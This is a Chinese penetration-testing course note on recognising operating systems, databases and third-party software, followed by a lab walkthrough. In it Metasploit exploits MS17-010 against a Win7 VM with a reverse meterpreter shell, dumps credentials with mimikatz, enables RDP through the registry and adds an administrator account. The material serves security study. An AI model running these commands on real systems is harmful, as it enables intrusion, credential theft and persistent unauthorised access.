p5:第05天:基础入门-系统及数据库等
前言:除去前期讲到过的搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到Web或服务器的安全,导致网站或服务器权限的获取。
一、基础知识
一、操作系统层面
1、识别操作系统常见方法
A.有网站
通过网站识别<br /> Windows对大小写不敏感,就可以替换网站路径的大小写进行测试<br />比如说对此网站地址更改大小写,发现打开的页面没有变化,说明这个操作系统可能是Windows。<br /><br /><br />下面这个p换成大写就出现了问题,说明这个操作系统对应的是linux系统。<br />
B.无网站
通过扫描识别
**nmap扫描(建议使用)**nmap -O IP地址
可以百度一下用法。
可以win上下载nmap然后配置环境使用,也可以直接使用kali的nmap扫描。
PS:不是所有的系统都可以用这种方式扫描出操作系统的类型,比如说Windows的一些高版本无法检测。
不过我这个win10虚拟机被扫描出来了。
C.TTL值判断
(不介意使用,不是很准确)
比如说ping一下博客,ttl=112,但是没有对应的值,跟WindowsNT/2000比较相近,其实是Windows2008的,和Windows NT相近。
D.特殊端口识别
2、简要两者区别及识别意义
区别:盘组合(网站路径问题:Windows有分盘,linux没有,存储方式不一样)、大小写、文件类型等等。
Windows和Linux的漏洞不一样,所以要对操作系统进行识别
3、操作系统层面漏洞类型对应意义
有些漏洞可能会影响权限的丢失,有的可能不会;不同漏洞会造成不同漏洞利用的条件。
比如MS17010-永恒之蓝漏洞,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。
4、简要操作系统层面漏洞影响范围
主要是围绕权限方面;有些漏洞会造成系统崩溃、蓝屏或者权限提升等等
二、数据库层面
1、识别数据库类型常见方法
网站99%是动态网站,1%是静态网站(没有用代码进行数据传输,无漏洞)。
必须要用数据传递才能有漏洞。
小型数据库:access、mysql
大型数据库:oracle、sqlserver
数据库不一定只有网站应用有,游戏应用也有,玩家数据就需要数据库。
有网站就识别,没有网站就用nmap来扫。
Asp数据库——Access/mysql
php + mysql
aspx+mssql
jsp +mysql/oracle
Python + MongoDB/MySQL
……
端口扫描:(端口开放性)
关系型数据库:
MySQL数据库默认端口号为,3306;
Oracle数据库默认端口号为,1521;
SQLServer数据库默认端口号为,1433;
postgreSQL数据库默认端口号为,5432;NoSQL数据库:
MongoDB默认端口号为:27017;
Redis默认端口号为:6379;
Memcached默认端口号为:11211;
————————————————
版权声明:本文为CSDN博主「携梦问道」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_41797451/article/details/120061216
DB2 5000
pointbase 9092
2、数据库类型区别及识别意义
数据库不同结构不同,漏洞也不同。
不同的数据库的攻击方式也不完全一样。
3、数据库常见漏洞类型及攻击
1、弱口令攻击
2、数据库漏洞攻击
参考
4、简要数据库层面漏洞影响范围
数据库权限、网站权限、修改网页内容
三、第三方层面
1、如何判断有那些第三方平台或软件
如果有自己下载的第三方软件,比如vsftpd,可能有漏洞,我们就可以根据这个漏洞攻击他。
如何判断:①通过网站扫描是否有第三方软件,比如phpadmin,通过扫描是否有安装目录来判断是否安装了第三方软件;②通过端口扫描。比如说扫描端口21,可能开启了ftp服务。
namp -sV 探测开放的端口服务和版本信息
2、简要为什么要识别第三方平台或软件
不同的第三方软件或工具存在不同的漏洞、识别到更多的信息对收集到的漏洞也就越多
3、常见第三方平台或软件漏洞类型及攻击
弱口令、软件的漏洞攻击
4、简要第三方平台或软件安全测试的范围
直接获取到软件的权限便于进一步的提权和攻击
四、补充
除去常规wEB安全及APP安全测试外,类似服务器单一或复杂的其他服务(邮件,游戏,负载均衡等),也可以作为安全测试目标,此类目标测试原则只是少了web应用或其他安全问题。所以明确安全测试思路是很重要的!
ps:后面课程安排:漏洞技术->web层面,系统层面,第三方等其他。
二、演示
1、上述涉及的基础知识演示(用kali的msf攻击)
(1)Metasploit定义及使用模块介绍
(2)实验设备
实验设备:kali、win7
靶机IP(win7):192.168.253.158**(关闭防火墙且需开放445端口)**
攻击机(kali):192.168.253.128
攻击工具:kali自带的msfconsole工具
互相ping一下。
(3)实验流程
A.用msfconsole查看靶机信息。
打开kali终端的msfconsole工具。
msfconsole
出现msf6,表示打开成功,可以输入命令。
寻找ms17-010漏洞试试手。
search ms17-010
可以看到auxiliary/scanner/smb/smb_ms17_010属于第三个。
接下来进入第三个,并查看其配置。
use 3
show options
标了yes的说明需要修改,标了no的可以直接使用其默认的。
进入use exploit/windows/smb/ms17_010_eternalblue。
use exploit/windows/smb/ms17_010_eternalblue //加载攻击模块
set lhost 192.168.253.128 //设置本机地址
set rhost 192.168.253.158 //设置靶机地址
set lport 4444 //设置本机端口号
set payload windows/x64/meterpreter/reverse_tcp //配置回链方式
查看刚刚配置好的。
show options
开始攻击。
exploit
用sysinfo查看靶机系统信息。
sysinfo
用screenshot截屏靶机的界面。
screenshot
进入该地址查看图片。
打开。
有点牛,还可以截屏到他的界面。
B.查看靶机登录用户及密码。
下载mimikatz。但是这个显示mimikatz已经呗kiwi替代了,所以自动下载了kiwi。显示success表示下载成功。下载后可输入help查看各指令的操作意义。
load mimikatz
输入creds_all直接获取密码。
creds_all
C.用msf将靶机的3389远程连接端口打开。
我们已经通过msf用ms17_010漏洞简单拿到了靶机的shell。
进入靶机的cmd操作。
shell
查看靶机的端口。
netstat -an
可以看到445端口是开着的,但是3389端口是关闭的,所以我们要打开3389端口。
开之前先查看现在是什么权限,必须为system权限才能进行开端口操作。
whoami
输入以下命令打开3389端口。(两种方法,选其中一个就行)
方法一:wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
方法二:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
开启成功。
也可以但看3389是否开启。
netstat -an|find "3389"
已经在监听了。
ps:远程桌面的默认端口是3389,但是可能管理员会更改了远程端口,所以我们需要通过查看注册表键值确认远程桌面的端口是否为3389。
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
(0xd3d是16进制的3389)
D.用kali自带的xfreerdp进行远程连接。
添加用户和管理组。123123为用户密码。用户名为hack。
net user hack 123123 /add
net localgroup administrators hack /add
在kali终端打开xfreerdp。
用下列命令进行远程连接。
/u是用户名,/p是密码,/v是靶机(目标)的地址, /size就是图形化界面的大小。
xfreerdp /u:hack /p:123123 /v:192.168.253.158 /size:80%
转到win7虚拟机,看到win7上出现了这个弹窗。
kali打开了freerdp界面,这里是重新加了win7用户的界面,在里面放了一个hack的文档。
留下一个文件。
回到靶机,登录了win7,没有变化;应该是因为我重新创建了用户,用密码123123登陆了hack用户,进入win7.
如果回到快照1,还会不会有hack用户呢?
没有hack用户了。因为我这个快照是在做这个实验前设置的。
参考网站:
2、演示某操作系统层面漏洞演示(Mysql 身份认证绕过漏洞(CVE-2012-2122))
参考网址:
不知道为什么一直失败。
先在ubuntu打开环境。
回到kali。
参考网址:Mysql 身份认证绕过漏洞(CVE-2012-2122)复现_m__ing的博客-CSDN博客
3、某数据库弱口令及漏洞演示
4、某第三方应用安全漏洞演示
参考网址: